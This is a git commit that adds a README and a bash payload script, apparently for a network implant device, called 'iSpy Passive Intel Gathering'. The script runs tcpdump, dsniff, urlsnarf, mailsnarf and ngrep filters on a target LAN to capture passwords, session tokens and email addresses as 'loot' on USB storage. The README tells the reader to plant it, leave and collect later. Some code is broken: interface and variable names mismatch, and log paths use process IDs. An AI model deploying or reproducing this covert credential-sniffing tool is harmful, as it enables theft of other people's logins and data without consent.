Added "Ispyintel" Payload (#20)

pull/23/merge
InfoSkirmish 2017-11-20 18:13:10 -06:00 committed by Sebastian Kinne
parent 39f9aee74f
commit cd43593044
2 changed files with 245 additions and 0 deletions

View File

@ -0,0 +1,61 @@
| | |
|:----------------|:---------------------------------------------------------------------------------------------------|
| **Title** | iSpy Passive Intel Gathering |
| **Description** | Launches various tools to sniff out intel data. Payload will run until the button is pressed. |
| **Author** | [infoskirmish.com](http://www.infoskirmish.com) |
| **Version** | 1.0 |
| **Category** | sniffing |
| **Target** | Any |
| **Net Mode** | Any (you choose) |
| Meaning | Color | Description |
|:----------|:-----------------:|:----------------------------|
| SUCCESS: | Blink Green | Payload ended complete |
| CLEAN UP: | Rapid White | Payload is shutting down |
| FAIL: | Blink Red | No USB storage found |
| ATTACK: | Blink Yellow | Payload is loging traffic |
This payload will automate gathering various recon data on whatever passes between it's Ethernet ports. Since all the data log file names are marked with a unique date stamp you can freely move from target to target deploy, gather, collect, move on without fear you are overwriting previous logs.
### **Requirements**
+ USB access to store loot.
### **Setup**
1. Edit the config variables at the top.
The main variables are:
lootPath="/mnt/loot/intel" # Path to loot
mode="TRANSPARENT" # Network mode we want to use
interface="br-lan" # Interface to listen on
2) Copy payload.sh into the ~/payloads/switch<n> folder you wish to deploy on.
3) Connect into a target machine with access to the LAN.
4) Set switch to the <n> spot and power up.
5) Leave, get coffee, take a nap while everything is recorded and parsed for future use.
6) When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.
7) When all is done the LED will just go blank. It is now safe to unplug and go about your day.
### **Tasks that are started**
| Task | About |
|:---------|:-----------------------------------------------------------------------------|
|tcpdump | So you have a record of every packet that was TX and RX |
|urlsnarf | So you can see all websites that were visited |
|dsniff | Will attempt to acquire passwords and what not |
|ngrep | On ports 80 and 21 with the filter for common password fields |
|ngrep | On ports 80 and 21 with the filter for common session id fields |
|log.txt | Logs the progress of the payload for easy troubleshooting. |
### **Clean Up**
Once completed (aka when the button is pressed) the payload will automatically parse the TCPDump log file for the following items and store the results in separate files. Note the TCPDump raw pcap file is left unharmed and still freely available for your dissecting pleasure.
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.
+ ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains
+ maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.

View File

@ -0,0 +1,184 @@
#!/bin/bash
#
# Title: iSpy Passive Intel Gathering
# Description: Launches various tools to sniff out intel data.
# Payload will run until the button is pressed.
# Author: infoskirmish.com
# Version: 1.0
# Category: sniffing
# Target: Any
# Net Mode: Any (default: Transparent)
# LEDs
# SUCCESS: Payload ended complete
# FAIL: No USB storage found
lootPath="/mnt/loot/intel" # Path to loot
mode="TRANSPARENT" # Network mode we want to use
interface="lo" # Interface to listen on
Date=$(date +%Y-%m-%d-%H%M) # Date format to use for log files
dsnifflog="dsniff_$Date.log" # DSNiff log file name
urlsnifflog="urlsnarf_$Date.log" # URLSniff log file name
tcpdumplog="tcpdump_$Date.pcap" # TCPDump log file name
httppwdlog="httpPasswords_$Date.pcap" # Potential HTTP password file name
sessionidlog="sessionids_$Date.pcap" # Potential Session IDs file name
mailsnarfLog="mailsnarf_$Date.log" # Mailsnarf data log file path.
function monitor_space() {
while true
do
[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
kill $1
LED G SUCCESS
sync
break
}
sleep 5
done
}
function finish() {
# Kill URLSnarff
echo "URLSnarff ending pid=$1" >> $1/log.txt
kill $1
wait $1
# Kill DNSniff
echo "DNSniff ending pid=$2" >> $2/log.txt
kill $2
wait $2
# Kill TCPDump
echo "TCPDump ending pid=$3" >> $3/log.txt
kill $3
wait $3
# Kill HTTP Password NGREP
echo "HTTP Password NGREP ending pid=$4" >> $4/log.txt
kill $4
wait $4
# Kill Session NGREP
echo "HTTP Session NGREP ending pid=$5" >> $5/log.txt
kill $5
wait $5
# Kill Mail Snarf
echo "Mail Snarf ending pid=$6" >> $6/log.txt
kill $6
wait $6
# I found that if this payload had been running awhile the next two steps may take a bit. It is useful to have some kind of indication
# that the payload accepted your button push and is responding. Thus the rapid white blink.
LED W VERYFAST
# Dump all unique IP address from TCP Dump file.
tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | sort | uniq >> $lootPath/ipv4found_$Date.txt
# Ok this is a really stupid grep pattern matching to search for emails; it is meant to give an over view of what is possible.
tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -Eiv "[\.]{2}" | grep -oE "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | sort | uniq >> $lootPath/maybeEmails_$Date.txt
sync
# Indicate successful shutdown
LED R SUCCESS
sleep 1
# Halt the system; turn off LED
LED OFF
halt
}
function run() {
# Create loot directory
mkdir -p $lootPath &> /dev/null
# Start tcpdump on the specified interface
tcpdump -i $interface -w $lootPath/$tcpdumplog &>/dev/null &
tpid=$!
# Log TCP Dump Start
echo "TCPDump started pid=$tpid" >> $lootPath/log.txt
# Start urlsnarff on the specified interface
urlsnarf -n -i $interface >> $lootPath/$urlsnifflog &
urlid=$!
# Log URL Snarff Start
echo "URLSnarf started pid=$urlid" >> $lootPath/log.txt
# Start dsniff on the specified interface
dsniff -c -m -i $interface -w $lootPath/$dsnifflog &
dsniffid=$!
# Log DSNiff Start
echo "DSNiff started pid=$dsniffid" >> $lootPath/log.txt
# Log potential plain text user names and passwords on port 80 and 21
# The thing is port 21 is the defult ftp port. Passwords and user names are exchanged in clear text!!!
ngrep -d $interface -i "user_pass|userid|pass|pwd|password|login|user_login|usr|USER" -W byline port 80 or port 21 -O $lootPath/$httppwdlog &
pwdgrep=$!
# Log Password NGREP Start
echo "Password NGREP started pid=$pwdgrep" >> $lootPath/log.txt
# Log potential plain text session ids, tokens, etc.
ngrep -d $interface -i "session|sessid|token|loggedin|PHPSESSID|CFTOKEN|CFID|JSESSIONID|sessionid" -W byline port 80 or port 21 -O $lootPath/$sessionidlog &
sessiongrep=$!
# Log Session NGREP Start
echo "Session NGREP started pid=$sessiongrep" >> $lootPath/log.txt
# Log mailsnarf data
mailsnarf -i $interface $lootPath/$mailsnarflog &
mailsnarfid=$!
# Log mailsnarf Start.
echo "Mailsnarf started pid=$mailsnarfid" >> $lootPath/log.txt
# Wait for button to be pressed (disable button LED)
NO_LED=true BUTTON
finish $urlid $dsniffid $tpid $pwdgrep $sessiongrep $mailsnarfid
}
# This payload will only run if we have USB storage
if [ -d "/mnt/loot" ]; then
# Set networking to TRANSPARENT mode and wait five seconds
NETMODE $mode >> $lootPath/log.txt
sleep 5
# Lets make sure the interface the user wanted actually exisits.
if [[ $(ifconfig |grep $interface) ]]; then
echo "" > $lootPath/log.txt
LED ATTACK
run &
monitor_space $! &
else
# Interface could not be found; log it in ~/payload/switch1/log.txt
ifconfig > $lootPath/log.txt
echo "Could not load interface $interface. Stopping..." >> $lootPath/log.txt
# Display FAIL LED
LED FAIL
fi
else
# USB storage could not be found; log it in ~/payload/switch1/log.txt
echo "Could not load USB storage. Stopping..." > log.txt
# Display FAIL LED
LED FAIL
fi